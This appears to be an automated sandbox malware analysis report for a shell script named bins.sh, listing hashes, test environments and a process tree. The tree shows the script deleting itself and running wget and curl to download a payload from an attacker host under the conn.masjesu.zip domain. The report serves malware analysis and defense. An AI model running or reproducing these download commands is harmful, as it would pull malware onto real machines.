Analysis
-
max time kernel
149s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
05/12/2024, 07:52
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
4ec351f49dc5766e37b9f2ca107ea79f
-
SHA1
1e9e758cc6d6441d23748b0a346dcfc1df30e105
-
SHA256
c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
-
SHA512
5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c
-
SSDEEP
192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm
Malware Config
Signatures
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1486 wget 1490 curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1484
-
/bin/rm/bin/rm bins.sh2⤵PID:1485
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- System Network Configuration Discovery
PID:1486
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- System Network Configuration Discovery
PID:1490
-